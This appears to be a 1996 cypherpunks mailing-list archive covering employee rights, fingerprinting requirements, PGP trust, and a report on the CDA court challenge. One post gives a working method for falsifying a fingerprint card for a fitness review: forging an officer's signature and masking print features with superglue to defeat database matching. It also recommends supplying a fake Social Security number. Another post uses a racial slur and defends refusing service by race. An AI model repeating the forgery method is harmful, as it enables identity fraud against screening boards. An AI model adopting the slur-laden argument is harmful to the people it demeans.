of individual privacy (encrypting COM e-mail is one example).
For example, the initial Swedish implementation of a national
criminal database in the mid 1970's (equivalent to the US NCIC) used
dialback telexes to prevent unauthorized (and untracked) access.
A recent newspaper article noted that some police officers were
being investigated for unauthorized access to the personal information
of a collegue who had complained of sexual harassment.

Martin Minow
minow@apple.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 May 1996 19:25:23 +0800
To: cypherpunks@toad.com
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <adbd5d47000210044169@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Professor Froomkin and I have many disagreements about the nature and
direction of laws in the U.S. I think I was careful to couch my points in
terms of what the law should be, not what it currently is.

For example, I think it fully Constitutional to choose not to serve blacks
in one's home, business, church, or whatever. Until fairly recently, the
courts saw it this way as well. (I'm not referring to state-sponsored
discrimination, such as keeping blacks and women from voting, or visiting
government-paid-for facilities, etc)

[This is a provocative statement to many. I can elaborate if there is real
interest. Suffice it to say that if I operated a bookstore, or gym, or
restaurant, or whatever, I would not personally choose to discriminate
thusly. Though I might with regard to other (unspecified here) so-called
minority groups. And it would be my free right to choose whom to hire, whom
to do business with, whom to serve, and so on. It's pretty clear in the
Constitution, as I see it, that the government is not empowered to tell
people whom they may associate with and whom they _must_ associate with.
Again, the so-called Civil Rights Movement, which had good origins in
overturning clearly unconstitutional laws about voting (Jim Crow laws),
state-enforced segregation, etc., has been carried to the point of
interfering with the right of free association.]

The current interpretation of the law makes it a crime for a restaurant to
allow smoking (at least in many--and increasing--locales). The current
interpretation (henceforth shortened to "CI" for brevity) says that a
church may not discriminate on the basis of religious affiliation, and
hence must not discriminate against Satanists. The CI says that a health
club may not discriminate against women (but, interestingly, many health
clubs here in my state of California are "women-only"). The CI says that if
a white person uses the term "nigger" he may be convicted, in some
jurisdictions, of a "hate crime," but if the coloreds use the term, it's
OK.

[Here in Santa Cruz, the term "black" has fallen into disfavor, and is
dubbed a label of the whitemale patriarchy. Thus, we have "lesbians of
color," "students of color," "queers of color," etc. As one leading thinker
puts it, "all wymyn are people of color." Therefore, colored people, or
coloreds, for short. We have come full circle.]

>The issue here isn't a constitutional issue.  It's a *statutory* right.
>And a real one.  Sex discrimination in employment is prohibited by law.
>We can call this a "civil right" or something else, but the if the facts
>alleged in the case to which TCM refers are as claimed, they seem to have
>a fairly good case under the law as it stands.  And there's a lot more
>than skimpy outfits at issue, including a refusal to hire men for what are
>allegedly food service jobs (gender may only be a determination of
>employment if it is a bona fide occupational qualfiication, e.g.  policing
>the showers in the gym; gender is not a BFOQ for food service jobs.)

It is not the business of any regulatory agency to _second-guess_ why I
want my girls at my Hooters to wear skimpy outfits. In fact, there is no
real doubt why the girls are dressed as they are. (Hint: the name.) The
girls can choose to work for me, or not. No slavery is involved.

(Of course, I also favor legalization of indentured servitude. The military
is allowed to buy X years of labor by paying for a student's education, so
why not IBM? It might actually help the unemployment crisis we are now in.)

In any case, I choose to focus on politico-jurisprudential issues, of what
the law _should_ be, not what the current mess says is the law.

As Roseanne Barr--not one of my favorites--recently so cogently observed:
"Heidi Fleiss is going to prison, OJ Simpson is playing golf in
Brentwood...we're living in Dante's Inferno."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 May 1996 19:23:47 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
Message-ID: <adbd6595020210043518@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:26 PM 5/13/96, Mark O. Aldrich wrote:
>On Mon, 13 May 1996, Senator Exon wrote:
>
><snip>
>> i can fill out and manipulate the card myself i just need a
>> working method.
>> is there no privacy advocate who can help me?
>>
>
>I think most privacy advocates would advise, "Refuse to submit."  It
>sounds like you're looking for more of a hack on the fingerprinting process.

And if you are working for me, and I ask for a fingerprint, and you refuse
or "smear" the results (repeatedly, as the first smearing I may just take
as your token protest and have you printed again), you'll be out the door
by the end of the day.

(Personally, I've never worked for a company which demands fingerprints,
but I've worked for companies which demanded ID badges and signatures, and
these are effectively as intrusive. And I suspect that my former employers
are now using thumbprints, and maybe full prints.)

What one "doesn't like" and considers an "invasion of privacy" varies from
person to person. Some people think having their picture taken is a
stealing of their soul. Others fear nefarious things will be done with the
DNA from their blood samples.

Trying to convince a company that photo ID badges and fingerprints are Bad
Things is perhaps admirable, just realize that in a free society that
employer is under no obligation to hire someone who refuses to go along
with the company's security policies. (This relates to the "civil rights"
thread.)


>of like a key certificate.  If you really can dork the card, have ten
>different people volunteer one print each.  There's no way that they'll
>ever be able to use that as evidence in a court or for any other purpose,
>either.

A stupid idea. As the employer, I wouldn't have to prove it a court of
law...suspicion alone that some of my employees were fucking up a security
system might be enough for me to either a. promote them to the Tiger Team,
or b. fire their asses.

(I just can't understand where this pervasive meme is coming from here on
this list, the notion that employers are severely limited in what they can
do to employees unless they can "prove it in court. Like it or not, most
employees in the United States are still employed "at will," and are not
covered by employment contracts such as some executives and the like get.)

>If you're forced to do this in person with a tech, you can continuously
>"fight" the grip they have on your hand and smudge the card.  However,

Sure. It makes it easy for the employer to simply say "Next candidate."


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 14 May 1996 19:30:06 +0800
To: eli+@GS160.SP.CS.CMU.EDU
Subject: Re: Transitive trust and MLM
In-Reply-To: <199605131833.LAA14629@toad.com>
Message-ID: <Pine.GUL.3.93.960513225226.19375C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996 eli+@GS160.SP.CS.CMU.EDU wrote:

> EALLENSMITH@ocelot.Rutgers.EDU writes:
> > Now, there's the question of whether you _need_ to be linked to everyone - 
> > [...] I see nothing wrong (and am in favor of) separation of the
> > elite from the masses.
> 
> Gee, let me guess which group you're in... I'll go with "people I want
> to talk to" versus "people I don't want to talk to", thanks.

That sounds sincere coming from someone who calls himself "eli+" :-)
 
> It's true that you don't need to talk to everybody.  The problem is
> that I might want to talk to people whom I don't know personally, but
> know by reputation, or by function ("DEA Rat Hotline" -- well, maybe
> not).

Yes, that is a problem. That problem is one of the reasons that public key
encryption was invented, actually.

The way to know whether an untrusted key really belongs to someone is to
wait for the response. Which means don't spill all the beans at once.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 14 May 1996 19:18:11 +0800
To: cypherpunks@toad.com
Subject: PRZ /PGP
In-Reply-To: <adbbd23b000210049f3d@[205.199.118.202]>
Message-ID: <199605140557.WAA02396@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


TCM
>(I haven't read Zimmermann's comments in full, to get the full context, but
>I doubt we'll agree on such things. His achievement with PGP was
>considerable, but I know from first-hand experience that his political
>views are very non-libertarian and are, in fact, counter to liberty.)

hmmmmm, surely you don't think you can get away without anyone
requesting an elaboration on this....

maybe post the comments through a remailer if necesary  <heh>

actually, I agree with this, but probably for other reasons.

it is well known (i.e. reported in articles) that Zimmermann was
considering moving out of the country to australia or canada during
the 80's because of the Reagan cold war situation. 

well, I don't blame him, but can he really cloak himself in the
mantle of a national patriot after this kind of thinking?

it may also be that Zimmermann has a set of beliefs that he
champions in front of the public, but that his private ideology
is more radical.  I tend to get this impression. he is very,
very careful about his public image and his reputation.

I suspect that Zimmermann's star is on the way to fading out,
at the moment, for some various reasons.  I only write this
because of a letter I read ealier from Raph Levien that
tended to confirm some of my suspicions.

1. he has a "I want it all" or "I want to win while everyone
else loses" ideology. this is what it took to write PGP when
no one else had ever even heard of public key crypto. but
suddenly when crypto becomes mainstream, the pioneers are
often pushed to the sidelines unless they adapt. 

2. he attained much of his accomplishments via the work of
others. there is no problem with this, but the issue of 
due compensation arises when he begins to sell this labor.
frankly I don't think PRZ is into "sharing". this is the
first point in a different context.

3. PRZ is actually somewhat anti-business in some ways.
he came from the outside, challenging the "establishment"
during nuclear war protests. he can put on a business suit
but I suspect there is a lot of different thinking going
on beneath the exterior.

4. PRZ has a bad track record as far as meeting deadlines.
it is not how his brain works. but this is how business
works. with public domain software, no one rants at you
if you don't come out with something when you say you will,
or even if you don't even say when you are going to be
ready. but when money is involved, this is the very
first thing you have to be accountable for, no excuses.

5. etc.

now, I am trying to be as generous as possible here. I really
admire PRZ and think he has an incredibly enviable 
feather in his cap with PGP, a very significant accomplishment.
but PGP can only be seen as a stepping stone unless he
adopts an aggressive strategy to stick his work into 
the standards of tomorrow. PRZ has shown a great unwillingness
to do this.

unless PRZ's personality changes in some fundamental way that
I think is highly unlikely, I think he will sentence himself
to obscurity in the face of a zillion people working on the
same ideas. obscurity is not a bad thing, really. PRZ has
reached the point where he has enough security to last him
the rest of his lifetime.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 14 May 1996 18:42:51 +0800
To: cypherpunks@toad.com
Subject: CDA Dispatch #10: Last Day in Court
Message-ID: <8lZzYJ_00YUv4zWlUt@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




-----------------------------------------------------------------------------
                        Fight-Censorship Dispatch #10
-----------------------------------------------------------------------------
                    The CDA Challenge: Last Day in Court
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this dispatch: The DoJ's flimsy, cheesy, flawed defense
                  Judges question DoJ investigation of CompuServe
                  "The Newspaper Decency Act"


   http://pathfinder.com/Netly/daily/960513.html
   The Netly News
   May 13, 1996 
   
   PHILADELPHIA -- Anyone want to bet on the outcome of the
   Communications Decency Act? I attended the whole thing, which ended
   Friday in a Philadelphia federal court, and here's the McCullagh
   Morning Line:
   
      3:1 that the CDA gets struck down as unconstitutional.
   
      It can't possibly be upheld -- not from what I understand about the
   First Amendment, not from what I heard of the flimsy, cheesy Justice
   Department case (and I heard the whole flimsy, cheesy defense) and
   certainly not from how the judges were acting on the last day of the
   hearing. Members of the three-judge panel practically laughed in
   exasperation at Justice Department wafflings.
   
      As you probably recall, The American Civil Liberties Union and
   American Library Association coalition challenged the so-called
   Decency Act on the grounds that it would unconstitutionally chill free
   speech online. The CDA would criminalize "indecent" speech on the Net,
   invoking a standard -- indecency -- that's yet to be defined.
   
      Not for lack of trying, of course. DoJ attorney Tony Coppolino
   danced a nimble flamenco around the legal meaning of "indecency" and
   what may or may not be prosecuted under the CDA, arguing on Friday
   that indecency is a "medium-dependent standard." That is, he said, it
   can be read to apply mostly to hardcore porn, not literature, and
   would leave most Web-based jottings alone. But he admitted: "We can't
   provide assurance that a prosecutor won't take on an absurd case."
   
      Dolores Sloviter, chief judge of the Third Circuit Court of
   Appeals, jumped down his throat: "I've been taking the position for 17
   years that people should know what they can be prosecuted for. Doesn't
   that present a problem?" she asked. "I still don't understand" what
   indecency means under the CDA, she said.
   
      "We've been trying to get at this for 40 minutes," grumbled Judge
   Stewart Dalzell.
   
      Later Dalzell grilled DoJ attorney Jason Baron over the Justice
   Department's decision to "review" a complaint lodged by the American
   Family Association against CompuServe's new adults-only service. (The
   AFA is the most virulent "family values" group involved in the fight
   over the CDA. Only a week after the law was passed, the AFA said it
   didn't go far enough.)
   
      Dalzell stressed that CompuServe had employed every blocking and
   parental control mechanism possible under current technology -- but
   that didn't stop the FBI from investigating the Columbus, Ohio-based
   corporation.
   
      "What more could CompuServe have done?" Dalzell asked.
   
      Baron cavilled. "The Justice Department was concerned this may be
   obscenity," he claims. The distinction between obscenity, which is
   illegal, and indecency, which is still undefined, is important, and
   that was a nice try by Baron. Unfortunately for him, the CompuServe
   forum in question has only Playboy-style centerfolds -- softcore stuff
   that the DoJ's own attorney Coppolino admitted earlier is not obscene.
   
      Clearly, the Government had no business looking into the CompuServe
   matter. Indeed, outside the courtroom at the end of the day, the ALA's
   Bruce Ennis charged that the government violated a restraining order
   barring them from investigating alleged CDA violations. "We were very
   upset. We think this violated the court order," said Ennis. "We went
   to court yesterday and asked for a clarification. That's now pending."
   
      The only defense against prosecution and conviction that the
   government offered was requiring credit cards before providing access
   to "indecent" speech on web sites -- a solution that Baron admitted
   isn't exactly practical for individual speakers.
   
      When Baron trotted out Dan Olsen's -L18 self-tagging scheme as an
   alternative, even the normally quiescent Judge Ronald Buckwalter
   noticed: "It's not available now. It's a hypothetical." Judge Sloviter
   added it was "the product of Mr. Olsen's creative imagination."
   
      In final arguments, Chris Hansen from the ACLU said not only would
   a requirement for -L18-style self-labelling "violate the prohibition
   against compelled speech," there is no tagging technology "that
   applies to Usenet newsgroups and mailing lists."
   
      The most unusual sideshows of the last day of the hearing was when
   government attorneys were forced to defend free speech in print.
   
      Would a "Newspaper Decency Act" banning violence on the top of the
   front page be constitutional? asked Judge Dalzell, waving a copy of
   the Philadelphia Inquirer with a photograph of a Liberian prisoner
   being executed. "My ten-year old son is a rabid Phillies fan" and came
   across this image, he said. (We must confess to missing the logic
   here: Are Phillies fans particularly sensitive to violence?)
   
      "The print medium enjoys the greatest protections -- the Internet
   is becoming more television-like," replied Coppolino, trying to dodge
   the question.
   
      The Philadelphia court is expected to issue a decision by mid-June.
   Both the plaintiffs and the Department of Justice have said they will
   appeal to the Supreme Court, which may decide to hear the case after
   it reconvenes in early October. Assuming the Justice Department loses,
   will they really appeal to the Supreme Court? If so, I object to my
   tax money being wasted on this crap.
   
   --By Declan McCullagh

-----------------------------------------------------------------------------

Mentioned in this article:

  DoJ refers American Family Association's CDA complaint to the FBI:
    <http://pathfinder.com/Netly/daily/960507.html>
   AFA "charges" CompuServe with violating the CDA:
    <http://fight-censorship.dementia.org/dl?num=2252>
  FBI finally rebuffs the AFA, when pressed:
    <http://fight-censorship.dementia.org/dl?num=2445>        
  Excerpts from DoJ and anti-porn groups' CDA briefs:
    <http://fight-censorship.dementia.org/dl?num=2387>
  Transcript of Olsen's "-L18" description and other testimony:
    <http://www.cdt.org/ciec/transcripts/April_15_Olsen.html>
  Mike Godwin on indecency vs. obscenity:
    <http://www.cs.cmu.edu/~declan/articles/godwin.indecency.txt>
 
This and previous Fight-Censorship Dispatches are available at:
  <http://fight-censorship.dementia.org/top/>
  <http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/>
  <http://www.epic.org/free_speech/censorship/lawsuit/>

To subscribe to the fight-censorship announcement mailing list for
future Fight-Censorship Dispatches and related discussions, send
"subscribe fight-censorship-announce" in the body of a message
addressed to:
  majordomo@vorlon.mit.edu

Other relevant web sites:
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>
  <http://www.ala.org/>

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 14 May 1996 19:39:13 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Civil liberties of employees (Re: FYB_oss)
In-Reply-To: <adbbd23b000210049f3d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960513230740.1838G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 May 1996, Timothy C. May wrote:
 
> Actually, one _does_ check one's Constitutional rights "at the door" (of an
> employer), and the confusion over this issue is pervasively destroying real
> Constitutional rights.

Yes and no...and kinda no.

Yes: your employer can require as conditions of employment many many 
things that the government could never require, e.g. the many examples 
Tim gives.

No: The constitution prohibits slavery.  This is in fact the *ONLY* part 
of the constitution that *directly* regulates private behavior 
(everything else either empowers or disempowers the goverment).  Hency 
your employer cannot enslave you constitionally.

And "sorta no":  The constitution empowers congress to legislate in many 
areas.  Congress has legislated many "civil rights" that do not arise 
directly from the Constitution, but rather from Congress's use of the 
powers delegated to it under that document.  Thus, an unsuspecting reader 
might be mislead when TCM serves up the bait by writing...

[...]
> 
> The Constitution is about what the government can and cannot require, not
> about what I as an employer can require. This point is frequently confusing
> to people who, in my opinion, haven't thought about it. Thus, a "Hooters
> girl" suddenly decides she doesn't like "displaying herself" to men and
> announces that her civil liberties are being violated by being told to wear
> skimpy outfits.
> > 

The issue here isn't a constitutional issue.  It's a *statutory* right. 
And a real one.  Sex discrimination in employment is prohibited by law. 
We can call this a "civil right" or something else, but the if the facts
alleged in the case to which TCM refers are as claimed, they seem to have
a fairly good case under the law as it stands.  And there's a lot more
than skimpy outfits at issue, including a refusal to hire men for what are
allegedly food service jobs (gender may only be a determination of
employment if it is a bona fide occupational qualfiication, e.g.  policing
the showers in the gym; gender is not a BFOQ for food service jobs.)

[I am away from Miami from May 8 to May 28.  I will have no Internet 
connection from May 22 to May 29; intermittent connections before then.]
 
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm there.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 14 May 1996 19:44:57 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <199605131344.PAA05388@spoof.bart.nl>
Message-ID: <Pine.SUN.3.93.960513225555.28004C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Senator Exon wrote:

> in connection with a character and fitness report i have been
> asked to supply a review board with a set of my fingerprints
> i have never been fingerprinted before
> i am not very keen on the idea now
> of course refusing will attract suspicion
> short of getting someone else to put their fingers in ink for
> me does anyone have a cute method by which to obscure my prints
> on those cute little cards without it being obvious?
> i can fill out and manipulate the card myself i just need a
> working method.
> is there no privacy advocate who can help me?

This all depends on your application.

If you're trying to avoid specific identification when you are already a
suspect of some crime or some such, you're in trouble.  Short of finding a
dead person with no print record himself and no prior history, you don't
have many options.

Using someone else's prints risks you acquiring their criminal record of
past present and future.

If, on the other hand, you are seeking to preemptively foil later computer
checks of your prints you are in luck.

Most fingerprint indexing schemes rely on specific features in prints
which are ranked and reduced to a checksum of sorts.  To foil a massive
nation wide computer search which may flag your prints, you have to be
sure that the checksum of the prints you submit and the actual checksum of
your real prints are two significantly different values.

Generally speaking fingerprint requirements that are not related
to national security issues permit you to submit a card with the signature
of a "law enforcement officer" who made the prints.  I assume that this is
the case with your situation.

In this event you can indeed do the prints yourself.  Simply use a foam
(not felt) ink pad to make the print impressions on the card.  Sign
whatever name you feel sounds official.  (The GPO prints out standard
cards for this exact purpose, I assume you have one already).

Before doing your own prints, go out and buy some superglue (gel is best)
and the finest sewing needle you can find.

Those places which are covered in superglue will repel the ink and leave a
blank spot when your finger is rolled across paper or the card.

By applying a very small amount of superglue to the high ranking features
of your fingerprints using the needle as a sort of paintbrush, you can
alter the computer checksum of your prints without attracting undue
attention to the visual appearance of the prints you submit.  Think of it
as the ability to erace certain features of your prints.  Obviously it is
important to know which features are significant to the indexing
system.  I'm not enough of an expert to know myself how to describe them
to you nor do I know for certain the most recent ranking systems of
features.

This is a tedious process and causes hand cramps.  It is, however,
extremely effective when properly done.

Any national computer search trying to locate the identity of your
real prints will likely skip right by your earlier submitted and distorted
prints.  A visual inspection, however, is unlikely to be fooled.

Some others have given you the advice that you should simply "refuse to
submit" prints.  I disagree.  A distorted record, especially if you create
one pre-emptively, will be especially beneficial while a refusal will
simply attract attention.  I recognize that some of the people on the list
here are a bit more "in your face" about their politics, but it is, for
example, hard to practice law without a professional license.  All the
constitutional arguments in the world don't mean anything when it comes to
actually making a living without a required professional license.

I compare it to the ease with which one submits a fake social security
number rather than simply refuse to submit one at all.  A fake one wont
raise any eyebrows, refusal will.

"What do you have to hide anyhow? Eh?"

Best of luck.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 14 May 1996 19:42:59 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SCO.3.91.960513134249.7157D-100000@grctechs.va.grci.com>
Message-ID: <Pine.GUL.3.93.960513233846.19375D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Mark O. Aldrich wrote:

> Pre-detached 
> or detachable limbs would be helpful. 

I nominate this for quote of the week.

In general, my answer remains, "Do you really want to work for an
organization that would make you do this? What are they going to make you
do next?" 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 14 May 1996 20:35:58 +0800
To: Allen Ethridge <ethridge@onramp.net>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <199605140009435096233@stemmons34.onramp.net>
Message-ID: <Pine.GUL.3.93.960513234411.19375E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Allen Ethridge wrote:

> I can't speak to the honorable senator Exon's situation, but my brother
> is being required to provide his fingerprints to prove that he is fit to
> be the legal guardian of his wife's daughter.  And it isn't his wife,
> currently the sole legal guardian, who is questioning his fitness or
> demanding his fingerprints.

It's times like those that Jim Bell makes some sense. SOME.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@onramp.net (Allen Ethridge)
Date: Tue, 14 May 1996 19:56:42 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.GUL.3.93.960513172942.14881J-100000@Networking.Stanford.EDU>
Message-ID: <199605140009435096233@stemmons34.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


> On Mon, 13 May 1996, Senator Exon <remailer@2005.bart.nl> wrote:

> > in connection with a character and fitness report i have been
> > asked to supply a review board with a set of my fingerprints
> > i have never been fingerprinted before
> > i am not very keen on the idea now
> > of course refusing will attract suspicion

> Honorable Senator, if you wish to work for the government (or certain
> other orgs with a big impact on the public, or in certain highly sensitive
> posts, like armed security guard), then you simply have to put up with
> this. Especially if you're working for *my* government, or flying *my*
> airplane, or guarding *my* money, it's not in my interest to help you.

> So... don't work for the government. Work for yourself, or for someone who
> treats you like a grownup. Liberty ain't always free and easy.

I can't speak to the honorable senator Exon's situation, but my brother
is being required to provide his fingerprints to prove that he is fit to
be the legal guardian of his wife's daughter.  And it isn't his wife,
currently the sole legal guardian, who is questioning his fitness or
demanding his fingerprints.

And on another thread, if rights are simply restrictions on the
government and not attributes (inate, even) of the individual, then they
are meaningless.


-- 
if not me, then who?
mailto:ethridge@onramp.net
http://rampages.onramp.net/~ethridge/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Tue, 14 May 1996 18:10:11 +0800
To: cypherpunks@toad.com
Subject: Interest to punks in latest CACM
Message-ID: <9605140451.AA17668@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


A Meeks article I think that would benefit some cypherpunks...
  - politics/effectiveness
"Comparing Information Without Leaking It" 
  - Fagin, Naor, Winkler
  - crypto/protocol
"A Reengineerings Framework for Evaluating a Financial Imaging System"
  - certificate processing workflow redesign.
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 May 1996 19:30:35 +0800
To: tcmay@got.net
Subject: Re: Civil liberties of employees (Re: FYB_oss)
Message-ID: <01I4OG5LPHSK8Y5BUB@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 13-MAY-1996 17:56:08.53

	What others have said in regards to implicit contracts is about what I
would have, with the addition that the inclusion of some third party should
occur to handle the cases when the contract (explicit or implicit) doesn't
cover something. Such a third party would preferably be an arbitration agency
chosen by the other parties to the contract, but can be a government if they
didn't chose one or the agency isn't available for some reason.

>(But contracts are of course possible. Enforcement of the terms is another
>matter. By the way, I think enforcement of such contracts should be handled
>outside the normal legal system, and paid for by the parties using the
>system.)

	One organization that I would like to see develop is one specializing
in the enforcement of extralegal/illegal contracts. Payments to a legal form of
such an organization should be tax-deductible, just as payments to private
security guards should be tax-deductible; you're doing the government's work
for it, so you shouldn't have to pay the government for it.
	Cryptography can be used to reduce the necessity for such in many
cases, or at least reduce the work involved - which should reduce the fees that
such an organization should need to pay. One aspect of this is digital
receipts; I need to take a look at Applied Cryptography to check out the
discussion there on them. Anyplace else I should look?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 May 1996 19:43:08 +0800
To: eli+@GS160.SP.CS.CMU.EDU
Subject: Re: Transitive trust and MLM
Message-ID: <01I4OGDUWTCA8Y5BUB@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"eli+@GS160.SP.CS.CMU.EDU" 13-MAY-1996 19:59:41.90

>EALLENSMITH@ocelot.Rutgers.EDU writes:
>>	The different paths going through those different signatures will be
>>correlated/non-independent, yes.... but that isn't the problem unless you're
>>considering multiple paths (in a more complicated version).

>To determine key validity, you do have to consider all paths.  If a
>single trusted path to the bad key exists, the attacker wins.

	Hmm.... a useful distinction in this is between multiple paths with
no common elements except the beginning and end and ones with common elements.
The sections of the ones with common elements that have no common elements
can probably be treated as a subset of the larger path - a virtual link, if
you will - with its values (trustworthiness et al) determined by the paths
contained within it.

>>	IIRC, there have been some sociological studies showing that _everyone_
>>is linked through 6 or so people.

>Milgram's "small world" experiments used a much looser sort of "link"
>than we want here.  It would be certainly interesting to know how
>large a difference this makes.

	Milgram? Thanks, I'll check for that name.

>It's true that you don't need to talk to everybody.  The problem is
>that I might want to talk to people whom I don't know personally, but
>know by reputation, or by function ("DEA Rat Hotline" -- well, maybe
>not).

	I'm not disputing that... just that you don't need to be able to go
through the web to reach everyone who's got a key. Admittedly, the subsection
of people who have keys are more likely (through being more technologically
sophisticated et al, on average) to be useful to contact than those who don't.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 14 May 1996 20:05:18 +0800
To: jamesd@echeque.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4OGVSC1B88Y5BUB@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jamesd@echeque.com" 13-MAY-1996 23:52:07.00

At 03:45 AM 5/13/96 EDT, E. ALLEN SMITH wrote:
>>	the conservatives won't let people just rate
>> "objectionable" material in order to keep it from them. They want it off the
>> net/world whether or not it's rated.

>In the course of channel surfing, I have once or twice come across
>the Christians ranting about pornography.  They have both legitimate
>and illegimate complaints, but mainly they emphasize the legitimate
>complaint.  PICS addresses this legitimate complaint.

	I've never heard a fundamentalist (there are other Christians than
fundamentalists, BTW) ranting about how they can be exposed to pornography;
it's always others they claim to be upset about. I was raised a Southern
Baptist, so I suspect I'm familiar with fundys.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Tue, 14 May 1996 21:19:15 +0800
To: cypherpunks@toad.com
Subject: Re: Accidental subscriber needs help off of list.
In-Reply-To: <199605130323.UAA15286@pacifier.com>
Message-ID: <ML-2.2.832063139.1541.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain



> >...and I was accidently placed on your Cyberpunk mailing

Uh huh....

unless someone's got a web page that autosubscribes people (and if there
is, please turn it off) I somehow doubt the accuracy of this description.

PS: does anyone know when nntp.hks.net will get cypherpunks working again?
Noise like what I'm writing now is *much* easier to skip via nntp...

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Tue, 14 May 1996 20:06:32 +0800
To: cypherpunks@toad.com
Subject: THE ONLY WAY TO UNSUBSCRIBE
In-Reply-To: <199605132111.QAA00205@silver.niia.net>
Message-ID: <199605140646.CAA22566@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
